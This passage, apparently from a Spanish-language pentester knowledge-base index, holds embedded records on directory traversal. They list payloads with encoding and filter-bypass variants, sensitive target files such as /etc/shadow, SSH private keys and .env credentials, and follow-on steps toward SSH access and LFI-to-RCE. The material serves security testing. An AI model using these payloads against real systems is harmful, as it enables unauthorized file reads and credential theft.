0.01476, -0.02205, -0.11831, -0.02066, -0.01137, 0.05928, -0.05885, -0.04166, 0.01223, -0.03295, -0.05884, -0.07915, 0.0367, -0.06599, -0.02269, 0.02609, 0.06786, -0.01092, 0.00402, 0.06329, 0.00792, -0.06218, -0.01351, 0.04796, 0.05724, 0.01112, -0.03112, 0.0135, -0.03121, 0.11282, -0.05865, 0.01755, 0.02941, -0.00391, 0.01015, 0.04458, 0.0627, 0.00598, -0.03171, -0.00766, -0.00018, 0.01834, 0.02351, 0.03842, -0.02322, 0.02391, -0.0839, -0.03649, -0.00085, 0.03021, -0.02937, 0.01749, -0.02764, -0.08428, 0.03418, 0.02913, -0.09158, -0.05781, -0.0515, -0.02954, -0.07108, 0.01277, 0.04134, -0.01577, 0.01413, -0.06077, 0.00774, -0.06232, 0.04581, -0.0522]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Payloads\n```\n../../../../etc/passwd\n....//....//....//etc/passwd (bypass de filtro que quita \"../\")\n%2e%2e%2f%2e%2e%2fetc%2fpasswd (URL-encode)\n%252e%252e%252f (doble URL-encode)\n/etc/passwd (ruta absoluta directa)\n..%c0%af..%c0%af (UTF-8 overlong)\n```", "indexar": "quΓ© herramienta sirve para realizar pruebas de inyecciΓ³n de directorios", "v": [0.07867, 0.02274, -0.21331, -0.17426, 0.15277, -0.09957, -0.08246, -0.01558, 0.04282, -0.06936, -0.04937, 0.01126, 0.01285, -0.21879, 0.01964, 0.05134, 0.15756, -0.11219, -0.09225, -0.09026, -0.01704, -0.01222, -0.14402, -0.04498, -0.12794, 0.14065, -0.05949, -0.004, -0.1623, 0.01352, -0.07323, 0.01618, 0.12013, -0.0641, -0.13989, -0.01413, -0.04888, 0.03796, 0.02871, 0.1691, 0.00237, 0.01612, -0.11767, 0.0503, -0.01656, 0.00493, 0.09171, 0.00267, -0.01198, 0.03566, 0.02563, -0.11342, -0.01635, -0.0316, -0.04434, -0.11058, 0.06988, -0.14066, 0.00071, -0.08601, -0.09054, -0.09453, -0.03936, -0.00044, -0.01961, -0.06789, -0.01832, -0.075, -0.04659, 0.02124, -0.06928, 0.0592, 0.08077, 0.01839, -0.1382, -0.01436, 0.0263, 0.07203, -0.04041, -0.04343, 0.0702, -0.00483, -0.0734, -0.00437, -0.06049, -0.05167, 0.05953, -0.03648, 0.07994, -0.14348, 0.02521, 0.03108, 0.00139, 0.07537, 0.05288, 0.04157, 0.0216, -0.06429, 0.02836, -0.06794, 0.17894, -0.09817, -0.05893, 0.05812, -0.03673, 0.03185, -0.07621, -0.00956, -0.08681, 0.00775, 0.12177, 0.02762, -0.04763, -0.03814, -0.02528, 0.08195, -0.00803, 0.00132, -0.06395, -0.05717, -0.01539, 0.06018, -0.09787, 0.01669, -0.07886, -0.03747, 0.02377, -0.01221, -0.01222, 0.03022, 0.06608, 0.03527, -0.0935, 0.0433, -0.05219, -0.0074, 0.01143, -0.11275, -0.02754, -0.06326, 0.04549, 0.01124, 0.02253, -0.07788, -0.01799, 0.05028, -0.01763, -0.0062, 0.02612, -0.03696, 0.00402, -0.08212, -0.01148, 0.05098, -0.045, -0.06403, 0.04274, -0.00347, -0.08776, 0.03753, -0.04006, -0.0551, -0.00558, 0.08068, 0.0182, -0.03886, 0.00237, -0.02838, 0.0343, 0.04543, 0.07013, 0.01692, 0.00991, -0.03356, 0.05729, 0.02245, -0.0413, -0.03718, 0.00245, -0.08803, 0.01075, 0.0018, -0.07304, -0.00905, 0.07346, -0.03841, 0.00213, -0.00896, 0.09945, 0.04086, 0.02569, 0.01608, 0.01394, -0.07515, 0.06851, 0.04993, 0.03803, -0.01737, 0.01049, -0.02017, -0.06851, -0.0216, -0.02391, -0.05886, 0.0043, 0.03885, -0.02441, -0.04328, -0.0199, -0.00341, 0.02153, 0.05563, 0.05954, 0.00562, -0.01501, -0.02125, 0.03318, 0.03812, -0.04857, 0.0227, -0.04388, -0.04779, 0.02631, -0.03244, -0.05358, 0.0273, 0.00672, -0.04717, -0.00068, 0.01614, 0.04076, -0.01893, 0.01523, 0.03006, 0.06383, -0.04947, 0.00061, 0.04484, -0.02381, -0.06589, -0.03373, 0.08414, -0.01518, 0.01521, -0.03418, -0.03214, -0.00963, -0.09446, -0.02647, -0.05907, -0.03257, 0.00166, 0.06174, -0.01347, 0.00416, 0.001]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Payloads\n```\n../../../../etc/passwd\n....//....//....//etc/passwd (bypass de filtro que quita \"../\")\n%2e%2e%2f%2e%2e%2fetc%2fpasswd (URL-encode)\n%252e%252e%252f (doble URL-encode)\n/etc/passwd (ruta absoluta directa)\n..%c0%af..%c0%af (UTF-8 overlong)\n```", "indexar": "con quΓ© puedo explorar rutas confidenciales como /etc/passwd", "v": [0.04338, 0.09484, -0.16949, 0.00106, 0.10726, -0.04147, 0.06784, -0.0233, -0.06965, -0.12171, -0.05755, -0.06856, 0.06565, 0.01933, 0.01111, -0.0321, 0.11428, 0.07378, 0.05021, -0.02706, -0.02708, -0.11144, -0.02397, 0.00196, -0.04205, -0.05352, 0.13746, -0.05332, 0.02204, -0.01109, -0.00559, 0.14039, 0.02733, -0.01974, -0.03582, 0.0247, 0.03189, 0.1206, -0.04853, -0.04315, 0.05775, -0.00772, -0.075, 0.13346, 0.11768, -0.09126, -0.14945, -0.03112, -0.03317, 0.01779, 0.01301, -0.10518, -0.17214, -0.09981, 0.1235, -0.02238, 0.12865, -0.02436, 0.03236, 0.1744, -0.01236, 0.07967, 0.05886, 0.1509, 0.06325, -0.10164, 0.05662, -0.04817, -0.09374, 0.02751, 0.02399, -0.00152, 0.0109, 0.07279, 0.02137, -0.04096, -0.02856, 0.04236, 0.12447, 0.07867, 0.03859, 0.04126, -0.04164, -0.00128, -0.06989, -0.05906, 0.06559, -0.02918, 0.02484, -0.04282, 0.08614, 0.01108, -0.10274, 0.01753, -0.03212, -0.00433, 0.06049, 0.06604, -0.08449, -0.03551, -0.07639, 0.08073, -0.10721, 0.09685, -0.03883, 0.09017, -0.01196, -0.0322, 0.06615, 0.01812, -0.01635, -0.01333, -0.07936, -0.04882, 0.0333, -0.01833, -0.14606, -0.06357, 0.00573, -0.03905, -0.07674, -0.00999, 0.00971, -0.01754, 0.05784, 0.04372, -0.11288, 0.08577, -0.00984, -0.02124, -0.0328, -0.04536, -0.07945, 0.00416, 0.05433, 0.04442, 0.01258, 0.00656, 0.02324, -0.03969, 0.04122, -0.0313, -0.0231, 0.0285, 0.11752, 0.07931, 0.00999, -0.0779, -0.06697, 0.03384, -0.07044, -0.02581, 0.01279, 0.12121, 0.07358, 0.02328, 0.03875, -0.07365, -0.03748, 0.14206, 0.04694, 0.07567, -0.0895, 0.02156, 0.04331, -0.02916, 0.00525, -0.07248, 0.01162, -0.10654, -0.04741, -0.02711, 0.03376, -0.05387, 0.03857, -0.05479, -0.01084, -0.04537, 0.09569, -0.07495, -0.0289, 0.03996, 0.04153, -0.03662, -0.02089, -0.04071, -0.00512, -0.02884, 0.04201, 0.01359, -0.00448, 0.06421, -0.02216, 0.03678, -0.02777, 0.00412, -0.02395, 0.01783, -0.02853, -0.04061, 0.0425, 0.01357, -0.03105, -0.03099, 0.0045, 0.02565, -0.04881, -0.00174, -0.0507, 0.0004, 0.05252, -0.07186, 0.05374, -0.10906, -0.07115, 0.05072, -0.01418, -0.04094, -0.04712, 0.00414, 0.05365, 0.09191, 0.10258, -0.02463, 0.05554, 0.02139, 0.04996, 0.01075, 0.03327, 0.01421, 0.04588, 0.07214, -0.04733, -0.02009, 0.10977, 0.00924, -0.00648, -0.08116, -0.05146, -0.04314, 0.06491, 0.04166, 0.02283, -0.0466, -0.01257, -0.02999, -0.10776, 0.05082, -0.00642, -0.0791, -0.08892, 0.03382, 0.01339, -0.01628, 0.02945, -0.06728]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Payloads\n```\n../../../../etc/passwd\n....//....//....//etc/passwd (bypass de filtro que quita \"../\")\n%2e%2e%2f%2e%2e%2fetc%2fpasswd (URL-encode)\n%252e%252e%252f (doble URL-encode)\n/etc/passwd (ruta absoluta directa)\n..%c0%af..%c0%af (UTF-8 overlong)\n```", "indexar": "ΒΏquΓ© tΓ©cnica se usa para eludir filtros que bloquean las referencias a padres", "v": [-0.03082, -0.08942, -0.06456, -0.15426, -0.00171, -0.09787, 0.08072, -0.17396, 0.00846, -0.12498, 0.0236, -0.09923, 0.00123, 0.06503, 0.07832, -0.10638, -0.04647, -0.09072, 0.14156, -0.17681, -0.07705, -0.10867, -0.06148, -0.04832, -0.16139, -0.01838, 0.01337, -0.00189, -0.15167, 0.01778, 0.0287, 0.05577, 0.0891, -0.10309, -0.03796, 0.04739, 0.04577, 0.04194, 0.08327, 0.08595, -0.123, -0.05946, -0.08349, -0.03392, -0.07501, 0.02042, 0.13279, 0.06203, -0.00652, 0.06544, -0.04203, 0.0103, -0.00515, 0.08326, -0.01287, -0.02163, 0.18621, 0.01306, 0.06046, 0.08386, -0.10192, 0.0254, 0.13433, -0.01167, -0.01438, -0.08042, -0.0608, -0.05706, -0.01905, 0.02191, -0.01214, -0.03639, 0.0584, -0.00047, -0.004, 0.13935, 0.03271, -0.00032, 0.01858, -0.05863, 0.01853, 0.02893, -0.02783, -0.05377, -0.02984, 0.03562, -0.02293, 0.00574, -0.08903, -0.23594, 0.04845, 0.08829, 0.09493, -0.09491, 0.03003, 0.02037, 0.03238, 0.16092, 0.0011, -0.04485, 0.04653, -0.06045, 0.04121, 0.08165, 0.0594, 0.05703, 0.05539, -0.109, -0.04547, -0.09858, -0.09679, 0.00411, -0.09286, -0.06081, -0.08383, 0.0819, -0.04942, -0.13382, -0.04904, -0.03983, -0.08557, 0.04219, 0.00028, 0.0025, 0.0654, 0.01043, -0.03389, -0.00737, 0.02879, 0.07079, -0.05648, 0.04721, -0.06962, -0.01223, -0.06045, 0.02089, -0.01984, -0.01036, 0.0537, -0.05209, 0.04523, 0.03309, -0.02363, 0.03529, -0.0308, -0.04167, -0.02304, -0.01934, -0.09052, -0.05423, 0.00832, -0.01664, 0.07081, 0.08852, 0.00733, 0.02676, -0.0543, -0.03604, -0.02091, 0.00132, 0.07024, 0.04712, -0.06684, -0.01625, -0.02709, 0.06919, -0.05565, -0.09502, -0.06591, -0.03369, -0.02042, -0.00876, -0.00047, -0.07002, -0.01196, -0.05002, -0.01602, -0.07468, -0.05164, 0.00941, -0.05448, 0.0213, -0.07969, -0.03003, -0.07481, 0.00471, -0.02368, 0.01175, 0.0105, 0.07698, -0.0278, -0.01374, -0.06809, -0.02778, -0.03676, -0.04938, 0.02808, -0.01693, 0.02522, 0.01671, -0.08619, -0.00586, 0.04164, -0.04864, 0.0187, 0.06176, -0.0306, -0.02697, 0.01976, -0.0003, -0.04275, -0.02345, 0.00488, -0.02279, -0.07531, 0.03646, -0.06469, -0.02659, 0.0316, 0.03057, 0.01878, 0.07331, -0.01239, 0.03679, -0.02101, -0.03019, 0.01614, 0.01168, 0.06121, 0.01312, -0.02583, -0.03532, -0.04527, 0.02098, -0.00335, 0.04488, -0.04263, 0.06833, 0.01197, -0.00609, 0.04039, -0.04716, 0.00764, -0.03061, -0.00635, -0.00311, -0.11375, 0.04856, 0.05733, -0.05235, 0.04994, 0.02282, -0.018, -0.01776, 0.08363, -0.04374]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Ficheros jugosos\n```\n/etc/passwd /etc/shadow /etc/hosts\n~/.ssh/id_rsa β†’ login SSH directo\nconfig.php web.config .env β†’ credenciales de BD\n/var/www/html/... β†’ cΓ³digo fuente (busca creds, segundos vectores)\n```", "indexar": "quΓ© herramienta sirve para escanear archivos y buscar credenciales ocultas?", "v": [0.02067, -0.10187, -0.20365, -0.08394, 0.07082, -0.1658, -0.07013, -0.07098, 0.02522, -0.06429, -0.14174, -0.02906, -0.02586, -0.07602, 0.1221, 0.06038, 0.13423, -0.02961, 0.04663, 0.07996, -0.04732, -0.01654, -0.07432, -0.05704, -0.15606, -0.07741, -0.0435, 0.04572, -0.12966, 0.02949, -0.03514, 0.15141, 0.01474, 0.02098, -0.09795, 0.04053, -0.08134, -0.05593, -0.07937, 0.04846, -0.0052, 0.06431, -0.0865, 0.04803, -0.01191, -0.03835, -0.06792, 0.16208, -0.04822, 0.06667, -0.12524, -0.20573, -0.13118, 0.03816, 0.00668, -0.12314, 0.09983, -0.07278, 0.08805, -0.09157, -0.15717, 0.04382, 0.01305, -0.02787, -0.04018, -0.0141, 0.00684, -0.05411, -0.1084, 0.05676, -0.08131, 0.06695, 0.09715, 0.04592, -0.0434, -0.06337, 0.02988, 0.02236, 0.01164, 0.02898, 0.09552, -0.02656, -0.08728, 0.06746, -0.04739, -0.03284, 0.03537, 0.0481, -0.06219, -0.06974, 0.01419, 0.0894, -0.07245, 0.06329, 0.01085, 0.01467, 0.10322, -0.06745, -0.03369, -0.02154, 0.04051, -0.1319, -0.10795, 0.13259, -0.01298, 0.08892, -0.02751, 0.00981, -0.07425, -0.00478, 0.1059, 0.04645, 0.01209, 0.04403, -0.01483, 0.08594, -0.02734, -0.07789, 0.00724, -0.03205, 0.04774, 0.03021, -0.06663, -0.01031, 0.01725, -0.04645, -0.02274, 0.05152, 0.00701, -0.03847, -0.05313, -0.08435, -0.10022, 0.06424, -0.06228, -0.05519, 0.03439, -0.09129, -0.04227, 0.02006, 0.10504, -0.02382, -0.05828, -0.11278, 0.0523, 0.03814, 0.07253, -0.04125, 0.04233, -0.13354, 0.01482, -0.00907, 0.01359, -0.00192, -0.02523, 0.03768, 0.01892, -0.07969, -0.09767, 0.05043, -0.04333, -0.00314, -0.02057, -0.00483, -0.03801, -0.09795, 0.03594, -0.00834, 0.01469, 0.00725, 0.07486, 0.0231, -0.00793, -0.12158, 0.01911, 0.01315, 0.01642, -0.06615, 0.03403, -0.08605, 0.00289, 0.0038, 0.01477, 0.00578, 0.06011, -0.02867, 0.07139, -0.05571, -0.03969, 0.01919, 0.04115, -0.03301, 0.00308, -0.02478, -0.04702, 0.01708, 0.01922, -0.03596, 0.03663, -0.04999, -0.04998, -0.00601, -0.03755, -0.02463, 0.02413, 0.03032, -0.00525, -0.03445, 0.01965, 0.04951, 0.03904, -0.0254, 0.06394, -0.06835, -0.00123, -0.03283, -0.01851, 0.02415, -0.02308, -0.01332, 0.00938, -0.01051, 0.04664, 0.00686, 0.01419, 0.04059, -0.01923, -0.00845, -0.02267, -0.04426, 0.01784, 0.00098, -0.06536, 0.02638, 0.02793, -0.06268, 0.03233, 0.00688, -0.03055, -0.03609, -0.01093, 0.03604, 0.00336, -0.01509, -0.06993, -0.04345, 0.01384, 0.01821, 0.01214, -0.04205, -0.03172, 0.03625, 0.01483, -0.03873, 0.08504, -0.04245]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Ficheros jugosos\n```\n/etc/passwd /etc/shadow /etc/hosts\n~/.ssh/id_rsa β†’ login SSH directo\nconfig.php web.config .env β†’ credenciales de BD\n/var/www/html/... β†’ cΓ³digo fuente (busca creds, segundos vectores)\n```", "indexar": "con quΓ© puedo detectar si un archivo contiene claves SSH o secretos de base de datos?", "v": [0.03329, -0.03615, -0.09, -0.12897, 0.05744, -0.19533, -0.09993, -0.1534, -0.02667, 0.04246, -0.10514, -0.02429, -0.12571, -0.11832, 0.14493, 0.02823, 0.1583, -0.0983, -0.01488, -0.03046, 0.10267, -0.14302, -0.05884, -0.07501, -0.13834, -0.10298, 0.08609, 0.15312, -0.09975, 0.04999, -0.06455, -0.01028, 0.00765, 0.0777, -0.03879, 0.14064, -0.04198, 0.04576, -0.07488, -0.00923, 0.05457, -0.01048, -0.07359, 0.1166, 0.06243, -0.01937, -0.06237, 0.06619, 0.03782, -0.044, -0.00025, -0.05675, -0.13534, -0.11434, -0.08668, -0.1118, 0.06327, -0.00053, 0.13466, 0.04565, -0.13238, 0.04659, 0.03104, 0.06826, -0.01028, -0.08855, 0.05458, 0.02134, -0.05767, 0.04565, -0.0142, 0.09252, 0.04102, 0.07099, 0.01201, 0.03545, 0.07424, -0.04882, -0.07437, 0.07772, -0.04523, 0.00492, -0.00323, 0.03635, -0.06125, -0.05664, 0.05927, 0.00433, 0.00242, -0.16526, 0.0902, 0.04362, -0.0076, 0.07034, 0.05243, 0.0294, -0.01247, -0.06429, -0.01538, -0.00246, -0.02555, 0.02593, -0.04717, 0.20802, 0.13304, 0.0607, -0.04615, -0.00096, -0.03761, -0.04709, -0.04844, 0.00632, -0.00096, -0.00755, -0.05153, 0.00352, 0.03107, 0.00381, -0.03871, 0.01134, -0.09575, -0.02972, -0.02067, 0.00598, -0.02319, -0.07612, -0.03223, 0.08084, -0.00465, 0.02878, -0.04339, 0.05443, -0.0634, 0.01504, 0.10517, 0.07948, -0.00588, -0.0175, -0.05359, -0.02679, 0.02881, -0.02036, -0.00168, 0.07593, 0.1, -0.04704, -0.0018, 0.03942, -0.11934, -0.03545, 0.00479, 0.00932, 0.04329, -0.00872, -0.01211, 0.03301, 0.03081, -0.10711, -0.04013, 0.01817, -0.02395, 0.05479, -0.11958, 0.02451, 0.0511, -0.09551, 0.00325, -0.02685, -0.00966, 0.04933, -0.00176, -0.03004, 0.03431, -0.11363, -0.00787, -0.04362, -0.05447, -0.07874, -0.0172, -0.04767, -0.0298, 0.00052, 0.03053, 0.04941, -0.03345, -0.026, 0.0435, -0.05406, -0.00168, -0.00011, 0.02067, 0.04685, 0.03024, 0.04628, 0.01626, -0.01154, 0.01232, 0.00564, 0.05891, -0.02789, -0.04107, -0.00489, -0.03759, 0.01555, 0.04053, -0.01035, -0.07684, -0.03469, 0.02201, -0.04856, 0.10278, -0.02354, 0.02656, -0.07276, -0.04413, -0.02239, -0.03954, 0.03392, 0.0174, 0.01156, -0.04035, 0.07962, 0.09643, -0.02915, 0.00361, -0.0457, 0.01534, 0.03371, 0.08708, 0.03401, 0.02016, 0.07506, 0.00853, 0.01728, 0.05443, -0.02624, -0.03872, 0.00247, -0.01714, -0.03261, -0.02812, 0.02659, -0.01891, -0.07605, 0.01844, -0.01769, -0.04705, 0.04029, 0.04011, -0.07971, -0.01714, -0.01043, 0.03488, -0.05536, 0.01506, -0.03636]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Ficheros jugosos\n```\n/etc/passwd /etc/shadow /etc/hosts\n~/.ssh/id_rsa β†’ login SSH directo\nconfig.php web.config .env β†’ credenciales de BD\n/var/www/html/... β†’ cΓ³digo fuente (busca creds, segundos vectores)\n```", "indexar": "quΓ© programa me ayuda a encontrar cΓ³digo fuente expuesto en servidores pΓΊblicos?", "v": [-0.02419, 0.08511, -0.05977, -0.23263, -0.00744, -0.18279, 0.09273, -0.1038, -0.11396, -0.12241, -0.11276, -0.07787, 0.03919, -0.09514, 0.04535, -0.10154, 0.177, -0.08925, 0.11253, 0.0529, 0.00835, -0.01318, -0.02508, -0.06289, -0.1066, 0.02121, -0.00394, -0.04341, -0.00646, -0.02497, 0.03508, -0.06665, -0.02099, 0.03882, -0.0588, 0.04678, 0.11566, 0.1033, -0.0955, 0.06819, 0.02823, -0.00775, -0.03034, -0.01279, -0.0298, -0.05381, 0.02051, -0.01448, 0.03023, -0.02807, -0.20907, -0.0953, -0.05453, -0.02508, -0.00416, -0.10149, -0.00831, -0.05705, -0.13925, 0.05138, -0.08097, -0.01472, -0.02235, -0.13274, 0.05429, 0.03031, 0.15352, 0.03171, -0.09959, -0.06884, -0.04886, 0.01183, 0.0041, -0.15222, -0.032, 0.02471, -0.08274, -0.16138, 0.03633, 0.05343, -0.03535, 0.0581, -0.0045, -0.00271, -0.03606, -0.1, 0.03226, 0.00629, -0.05353, -0.04564, 0.09981, 0.03878, -0.01405, 0.11404, -0.01895, 0.02137, 0.05738, -0.00429, 0.04854, 0.05032, 0.07459, -0.08419, -0.01906, -0.01975, 0.01037, 0.09151, 0.10769, -0.08378, -0.08969, 0.06, 0.01344, -0.09581, -0.03473, 0.02925, -0.08563, -0.06301, 0.06452, 0.01908, -0.02641, -0.03124, -0.07171, 0.07175, -0.0231, 0.11273, 0.07809, -0.0141, 0.03537, 0.05497, 0.01555, -0.0197, -0.05206, 0.0234, 0.01445, 0.03664, -0.01379, -0.03313, 0.0799, -0.01003, -0.01959, -0.00467, 0.01751, -0.01444, 0.06674, 0.05796, 0.01367, -0.0589, 0.08062, -0.07961, -0.05593, -0.01974, 0.01196, -0.01076, -0.02275, -0.00056, -0.10428, -0.00509, 0.03039, -0.01845, -0.1343, -0.0522, -0.06992, -0.02579, -0.03903, -0.0439, 0.04903, 0.00871, -0.00637, 0.06975, 0.05097, 0.03397, -0.00757, 0.03146, 0.10914, -0.10614, 0.02845, -0.06052, -0.06942, -0.12337, -0.00953, 0.0513, -0.05051, 0.06181, 0.06281, 0.00228, -0.03476, -0.06678, 0.00537, -0.03322, -0.01255, -0.04652, 0.02023, -0.02433, 0.03479, 0.02621, 0.03084, -0.03755, 0.02347, 0.01113, 0.02244, -0.07537, -0.05078, 0.02233, -0.0081, -0.02912, 0.02136, 0.07095, -0.06691, -0.00737, -0.02501, 0.08828, 0.05897, -0.00618, 0.12958, 0.00643, -0.01364, 0.00997, -0.00575, 0.02711, 0.0313, -0.04473, -0.02093, -0.04539, 0.03118, 0.00032, 0.03583, -0.0477, 0.05383, 0.00712, 0.00815, 0.03911, -0.01618, -0.05211, 0.00299, -0.01628, 0.01188, -0.03136, -0.05234, -0.01785, -0.01529, -0.111, 0.01048, 0.07348, -0.01767, -0.0722, 0.00744, -0.05072, -0.0297, -0.05925, -0.01003, 0.0395, 0.01156, 0.00612, 0.03213, -0.05973, 0.03117, -0.02946]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Siguiente paso\n- Lees `id_rsa` β†’ SSH como ese usuario.\n- Lees cΓ³digo/config β†’ credenciales β†’ Authentication attacks / reutilizaciΓ³n.\n- Si ademΓ‘s se **incluye** (PHP) β†’ escala a LFI a RCE.\n\nRelacionado: LFI a RCE Β· Burp Repeater e Intruder Β· OSCP MOC", "indexar": "que herramienta me sirve para realizar ataques de reutilizaciΓ³n de credenciales en configuraciones?", "v": [-0.09957, 0.01807, -0.3026, -0.15753, 0.23668, -0.13886, -0.00015, 0.04637, -0.01168, -0.03714, -0.11373, -0.05691, 0.04057, -0.13221, 0.13887, 0.02533, -0.00934, -0.05589, 0.06139, 0.00726, 2e-05, -0.06432, -0.03862, 0.09335, -0.11173, 0.03891, 0.06472, -0.03927, -0.11216, -0.03426, 0.06754, 0.05416, -0.03273, -0.0404, -0.01325, -0.00139, -0.06617, 0.10381, 0.00775, 0.10643, -0.0639, -0.03548, -0.15211, 0.0375, 0.12038, 0.01923, -0.01206, -0.00182, -0.01792, 0.09015, 0.00912, -0.07058, -0.15042, -0.06095, 0.01235, -0.0964, 0.15149, -0.16839, 0.05813, -0.20467, -0.12357, 0.05125, -0.00553, -0.04457, 0.0689, -0.03774, -0.07362, -0.07039, -0.06166, 0.07444, -0.02308, 0.00797, -0.01402, -0.03558, 0.03917, -0.03391, 0.05641, 0.06326, 0.11982, -0.01303, 0.08014, -0.00544, -0.12632, -0.04816, -0.09006, -0.01474, 0.03594, -0.07643, -0.02887, -0.04675, 0.02281, -0.01229, -0.02797, -0.0582, -0.01009, 0.03727, 0.0095, -0.04772, -0.03631, -0.03592, 0.08686, -0.05505, -0.07516, 0.07107, -0.01917, 0.03322, 0.01, -0.0194, -0.02808, -0.11136, 0.03078, 0.01457, -0.00791, -0.04448, 0.00803, 0.03225, -0.00676, 0.01106, 0.05697, -0.06252, -0.02766, -0.02301, -0.02299, 0.0173, -0.06456, 0.07704, -0.09246, 0.0312, -0.01039, -0.08036, -0.05127, -0.03936, -0.02018, 0.02738, -0.0334, -0.01753, 0.00973, -0.15343, -0.03495, -0.05003, 0.07339, 0.09678, -0.00929, -0.05397, 0.03622, 0.04627, 0.01775, -0.063, -0.02245, -0.00909, 0.06218, 0.02286, 0.06115, 0.04318, -0.08562, 0.01456, -0.02907, -0.01167, -0.06288, 0.0786, -0.05084, -0.03612, 0.04526, 0.02433, -0.0031, -0.06439, -0.00012, 0.00023, 0.10696, 0.08688, 0.02112, 0.00781, 0.03539, -0.08639, 0.02488, -0.03201, -0.06025, -0.02898, -0.01565, -0.07363, -0.01846, -0.06438, -0.03119, -0.00333, 0.03685, -0.04515, 0.05155, -0.00576, 0.00757, -0.0028, 0.01705, -0.02039, 0.01061, 0.00219, 0.05906, -0.02862, -0.06319, -0.05162, -0.01843, 0.0154, -0.00931, -0.03358, -0.05219, -0.07157, 0.05151, 0.11736, -0.00754, -0.04556, -0.00928, 0.04531, 0.04924, -0.02446, 0.06624, -0.03096, -0.04947, -0.0491, 0.05719, 0.01715, -0.02487, -0.02974, 0.03695, -0.01968, 0.01792, 0.01419, -0.0325, -0.01027, -0.00951, -0.05059, 0.02164, 0.01003, 0.01388, -0.02971, -0.03291, -0.02599, 0.00485, -0.07306, 0.04715, -0.00717, -0.0572, -0.02719, -0.01515, 0.00476, 0.02913, -0.02897, -0.06249, -0.04367, -0.05677, -0.04467, -0.00447, -0.04967, -0.00954, 0.02197, 0.04986, -0.04626, 0.01196, -0.00518]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Siguiente paso\n- Lees `id_rsa` β†’ SSH como ese usuario.\n- Lees cΓ³digo/config β†’ credenciales β†’ Authentication attacks / reutilizaciΓ³n.\n- Si ademΓ‘s se **incluye** (PHP) β†’ escala a LFI a RCE.\n\nRelacionado: LFI a RCE Β· Burp Repeater e Intruder Β· OSCP MOC", "indexar": "cual es un programa para escalar vulnerabilidades de inyecciΓ³n desde LFI hasta RCE?", "v": [0.16339, -0.00859, -0.14708, 0.00477, 0.12891, -0.05582, -0.0333, -0.11161, -0.05578, -0.00446, 0.04576, -0.12153, -0.0705, -0.03673, 0.11856, 0.08229, -0.06789, -0.00702, -0.06161, -0.02125, -0.06735, -0.05553, -0.03642, -0.08501, -0.02935, 0.09078, -0.06885, -0.08327, 0.05061, -0.18104, 0.04784, 0.04604, 0.04336, -0.02917, 0.09935, -0.00828, 0.01781, -0.02396, 0.07717, 0.02647, 0.00527, 0.04365, -0.09845, -0.01054, 0.12951, -0.01193, 0.05571, 0.03184, 0.17824, -0.04536, 0.00233, 0.01257, 0.03746, -0.12032, 0.00433, 0.01909, 0.08789, -0.03813, -0.00484, -0.01382, -0.00033, 0.06099, 0.0337, -0.16766, 0.00304, -0.0469, -0.00332, -0.0629, -0.14736, 0.02237, -0.07465, -0.01736, 0.00881, -0.03303, -0.00084, 0.04136, -0.00244, -0.05343, 0.05942, -0.04804, -0.01943, 0.01883, 0.00558, 0.13426, -0.06561, -0.00898, 0.16842, -0.03144, 0.08023, 0.03196, 0.06547, -0.07365, -0.04751, -0.00825, 0.04911, -0.04285, 0.14848, -0.00756, -0.0753, 0.06455, -0.10869, -0.08503, -0.01216, 0.11522, -0.00463, 0.07825, -0.02032, -0.01877, -0.03924, 0.03878, 0.01024, 0.03503, -0.0902, -0.05044, -0.15433, 0.01369, -0.03823, -0.04795, 0.00031, -0.12799, -0.08749, -0.0306, -0.08421, 0.02009, 0.04583, -0.01589, -0.08806, 0.03543, -0.05021, -0.00907, -0.02576, 0.04087, 0.11948, 0.01001, -0.06312, -0.01877, 0.01282, -0.08271, -0.00611, -0.0267, 0.10336, 0.07999, 0.0737, 0.04731, 0.07878, 0.06466, 0.01089, -0.12335, -0.02249, 0.0166, -0.02133, 0.11621, 0.01343, 0.15486, 0.05343, -0.07366, -0.0081, -0.05934, -0.07331, 0.13268, -0.001, 0.08827, -0.04413, 0.07043, 0.04906, -0.03864, 0.03287, -0.00344, 0.03964, 0.06432, 0.00336, 0.05189, 0.03483, 0.01533, 0.05007, -0.04214, 0.01466, -0.08986, 0.05433, -0.02519, -0.04165, 0.00131, 0.08302, 0.0272, -0.00556, -0.03622, -0.06668, 0.05925, 0.04524, 0.01356, -0.08649, -0.01552, -0.05053, -0.03127, 0.01072, -0.09892, -0.01217, -0.0132, 0.01646, -0.0322, -0.05172, -0.00599, -0.05586, -0.04395, 0.0306, 0.01223, 0.00301, -0.01109, -0.00383, 0.11965, 0.02989, -0.01495, 0.08942, -0.01804, -0.01187, -0.06631, 0.02852, 0.08178, 0.00239, -0.02578, -0.05249, 0.03509, 0.08521, -0.00392, -0.00607, -0.06909, -0.01762, 0.01005, -0.00552, 0.03552, -0.02957, -0.0494, -0.0261, -0.01837, 0.05333, 0.03361, 0.00668, 0.05173, -0.00532, -0.09644, 0.00856, 0.07251, 0.01652, -0.05591, -0.01931, -0.01226, -0.04222, 